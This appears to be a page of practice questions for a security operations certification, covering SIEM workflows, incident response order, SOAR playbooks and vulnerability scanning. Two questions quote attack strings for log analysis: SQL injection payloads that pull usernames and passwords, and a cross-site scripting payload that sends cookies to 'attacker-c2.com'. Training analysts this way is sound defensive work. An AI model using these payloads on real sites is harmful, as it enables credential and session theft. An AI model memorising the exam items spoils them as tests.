Security Operations
627 questions
A security analyst is setting up a Security Information and Event Management (SIEM) pipeline to process incoming telemetry from enterprise web application firewalls. Arrange the stages of the SIEM log processing workflow in the correct operational sequence, from initial data receipt to incident notification.
Drag items to arrange them in the correct order
During an active security monitoring shift, an analyst discovers anomalous command-and-control (C2) beacons originating from an internal human-machine interface (HMI) jump host connected to a critical industrial control network segment. The incident response playbook mandates immediate action to prevent further lateral movement without shutting down the physical system. Which of the following actions should the analyst perform FIRST according to standard incident response frameworks?
During an ongoing incident, a security analyst discovers that an internal web application service account was compromised and is actively attempting unauthorized Kerberoasting attacks to extract Active Directory ticket-granting service hashes. According to standard NIST incident response frameworks, which of the following actions should the incident response team perform FIRST during the containment phase?
A security operations team is refining its enterprise assessment strategy for a network containing sensitive database servers and production workstations. The team wants to achieve accurate discovery of missing operating system patches and local software vulnerabilities while minimizing service disruption and network bandwidth strain. Which of the following scan configuration strategies should the team implement? (Select TWO.)
Select all that apply
A security analyst is selecting scanning techniques for various operational scenarios across an enterprise network. Match each vulnerability assessment technique to its corresponding characteristic or primary use case.
Click a left item, then click its matching right item
Items
Matches
A Security Operations Center (SOC) analyst detects an active exfiltration attempt where an unauthorized external IP address is utilizing a compromised cloud API key to download sensitive data. Place the following incident response playbook actions in the correct sequential order from FIRST to LAST.
Drag items to arrange them in the correct order
A Security Operations Center (SOC) analyst is investigating an alert and reviews the following web application access log entries ingested by the SIEM:
192.168.1.50 - - [27/Jul/2026:14:10:02 +0000] "GET /products.php?id=1 HTTP/1.1" 200 4520
192.168.1.50 - - [27/Jul/2026:14:10:15 +0000] "GET /products.php?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 18450
192.168.1.50 - - [27/Jul/2026:14:10:22 +0000] "GET /products.php?id=1%20UNION%20SELECT%20username,password%20FROM%20users HTTP/1.1" 200 32100
192.168.1.50 - - [27/Jul/2026:14:11:05 +0000] "POST /admin/login.php HTTP/1.1" 302 412
Based on the log analysis, which of the following best identifies the type of attack occurring and the most effective preventive control?
A security analyst conducts a scheduled vulnerability assessment against an internal database cluster. The network scanner reports multiple critical operating system patch vulnerabilities on the target servers based on exposed service banners. Upon further inspection, the system administrator notes that the enterprise patch management policy uses Linux vendor backporting, which patches vulnerabilities without incrementing the reported software release version string. Which of the following scanning approaches should the analyst implement to obtain accurate patch compliance results and eliminate these false positives?
A security analyst receives a high-priority alert from a perimeter Network Intrusion Detection System (NIDS) indicating anomalous, high-frequency outbound HTTPS connections from an internal host to an unrated external IP address. Place the operational monitoring and initial response steps in the correct chronological order from alert reception to formal escalation.
Drag items to arrange them in the correct order
During an incident response post-mortem, security analysts observed that an automated containment workflow inadvertently isolated a core database server following a low-fidelity intrusion alert. To maintain rapid automated response capabilities for routine systems while protecting vital infrastructure from self-inflicted service disruptions, which implementation modification should be applied to the playbook design?
A network security monitoring (NSM) sensor captures telemetry from an isolated subnet containing an intentional decoy server. The Network Intrusion Detection System (NIDS) generates alerts containing the following captured HTTP GET request payloads:
Payload 1: GET /search.php?id=100' UNION SELECT username, password FROM users--
Payload 2: GET /profile.php?name=<script>document.location='http://attacker-c2.com/collect?c='+document.cookie</script>
Which of the following statements correctly interpret this network telemetry and security control architecture? (Select TWO.)
Select all that apply
A cybersecurity analyst must conduct a comprehensive vulnerability assessment on internal Linux servers hosting sensitive database services. The assessment requirements specify that the process must identify missing local software updates and misconfigured operating system kernel parameters while minimizing network bandwidth consumption and avoiding risk of service disruption caused by active network probing. Which of the following vulnerability assessment approaches best fulfills these operational requirements?
A network security analyst receives a SIEM alert indicating suspicious encrypted outbound traffic from an internal host to an untrusted external IP address. Place the following incident triage and network monitoring response actions in the correct chronological order, from initial alert confirmation to threat containment.
Drag items to arrange them in the correct order
A security operations center (SOC) team is deploying a Security Orchestration, Automation, and Response (SOAR) playbook to handle automated containment when secret-scanning tools detect exposed API keys in public code repositories. In what sequence should the SOAR engine execute the following playbook steps?
Drag items to arrange them in the correct order
During an ongoing incident investigation, an incident response team discovers that an employee's workstation was compromised via a malicious macro attachment, enabling unauthorized network scanning and lateral movement attempts towards internal file servers. According to standard incident response playbooks for host compromise, which of the following containment actions should the team perform immediately? (Select TWO.)
Select all that apply
A cloud security operations center receives automated alerts flagging unusual outbound DNS query patterns originating from an internal web application server. The telemetry reveals thousands of high-frequency sub-domain requests formatted as encoded payloads appended to an external domain, accompanied by oversized TXT record responses. Which of the following initial actions should the security analyst take to investigate and contain this activity? (Select TWO.)
Select all that apply
A security operations team deploys an automated Security Orchestration, Automation, and Response (SOAR) playbook to mitigate compromised account alerts. The playbook is designed to connect to the organization's identity provider and immediately invalidate active session tokens when high-confidence alert criteria are met. During testing, the SOAR workflow successfully authenticates using API credentials but fails when attempting to execute the token revocation call, returning an HTTP 403 Forbidden response. Which of the following best explains why this automated remediation step failed?
During off-hours monitoring, a security operations analyst identifies an active, unauthorized bulk exfiltration of sensitive personnel records from an internal HR database server to an external IP address via a compromised service account. The analyst has confirmed that the exfiltration is actively taking place. According to standard incident response lifecycle guidelines, which of the following actions should the analyst take FIRST?
Match each vulnerability scanning methodology with its most appropriate enterprise operational scenario.
Click a left item, then click its matching right item
Items
Matches
A network security monitoring (NSM) system triggers an automated alert indicating anomalous outbound TLS traffic from an enterprise host to an unrated external IP address. In what sequence should a network analyst execute the technical triage and mitigation workflow?
Drag items to arrange them in the correct order